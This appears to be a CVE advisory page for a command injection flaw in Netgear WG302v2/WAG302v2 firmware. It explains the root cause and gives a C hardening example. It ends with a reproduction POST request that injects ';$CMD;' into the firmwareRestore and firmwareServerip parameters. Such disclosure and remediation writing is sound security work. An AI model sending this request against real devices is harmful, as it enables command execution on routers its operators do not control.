CVE-2023-38921
Description
Netgear WG302v2 v5.2.9 and WAG302v2 v5.1.19 were discovered to contain multiple command injection vulnerabilities in the upgrade_handler function via the firmwareRestore and firmwareServerip parameters.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability mechanics
Root cause
"The upgrade_handler function does not validate user input for firmwareRestore and firmwareServerip parameters, allowing command injection."
Attack vector
An attacker with administrative privileges can exploit this vulnerability by sending a crafted POST request to the `/ngadmin.cgi?action=upgrade_handler` endpoint. The payload can be injected into the `firmwareRestore` or `firmwareServerip` parameters. By using metacharacters such as ';', the attacker can append arbitrary commands to be executed on the system [ref_id=2].
Affected code
The vulnerability lies within the `upgrade_handler` function, which processes user inputs for `firmwareRestore` and `firmwareServerip`. These parameters are subsequently passed to a `tftp` function, which utilizes `system()` without proper validation, leading to command injection [ref_id=2].
What the fix does
The advisory does not specify the exact fix implemented. However, it indicates that NETGEAR is a CVE Program Partner and assigns CVE IDs to vulnerabilities in their products. Users are advised to refer to NETGEAR's security advisories for information on remediations and fixes for supported products [ref_id=1].
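One way a handler of this kind can be hardened, shown as an added example that is not NETGEAR's fix and not code from the firmware: validate both values against a strict allowlist, then pass them as separate argv entries to an exec-style call instead of building a `system()` string. It assumes `firmwareRestore` carries a plain file name and `firmwareServerip` an IPv4 address, and that the device uses a BusyBox-style `tftp -g -r FILE HOST` client; the function names are hypothetical.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Accept only a literal dotted-quad IPv4 address. inet_pton() rejects
   any trailing text, so "10.0.0.2;reboot" does not pass. */
int valid_server_ip(const char *s) {
    struct in_addr a;
    return s != NULL && inet_pton(AF_INET, s, &a) == 1;
}

/* Accept a plain file name: 1..64 chars from [A-Za-z0-9._-], not
   starting with '-' (option injection) or '.' (hidden file, ".."). */
int valid_fw_name(const char *s) {
    static const char ok[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                             "abcdefghijklmnopqrstuvwxyz0123456789._-";
    size_t n;
    if (s == NULL) return 0;
    n = strlen(s);
    if (n == 0 || n > 64 || s[0] == '-' || s[0] == '.') return 0;
    return strspn(s, ok) == n;
}

/* Fill argv for execv()/posix_spawn(), so no shell ever parses the
   values. Returns 0 on success, -1 if either value is rejected. */
int build_tftp_argv(const char *file, const char *ip, const char *argv[6]) {
    if (!valid_fw_name(file) || !valid_server_ip(ip)) return -1;
    argv[0] = "tftp"; argv[1] = "-g"; argv[2] = "-r";
    argv[3] = file;   argv[4] = ip;   argv[5] = NULL;
    return 0;
}

int main(void) {
    /* Constructed sample inputs: one benign pair, one with the
       metacharacter pattern from the report. */
    const char *argv[6];
    printf("benign:   %d\n", build_tftp_argv("fw-5.2.9.img", "192.168.0.10", argv));
    printf("injected: %d\n", build_tftp_argv(";$CMD;", ";$CMD;", argv));
    return 0;
}
```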
Preconditions
- auth: The attacker must be authenticated as an administrator.
- input: The attacker must provide a malicious payload in the `firmwareRestore` or `firmwareServerip` parameters.
Reproduction
```
POST /ngadmin.cgi?action=upgrade_handler HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/ngadmin.cgi?action=up
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

firmware-upgrade-file=up&firmwareRestore=;$CMD;&firmwareServerip=;$CMD;
```
Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.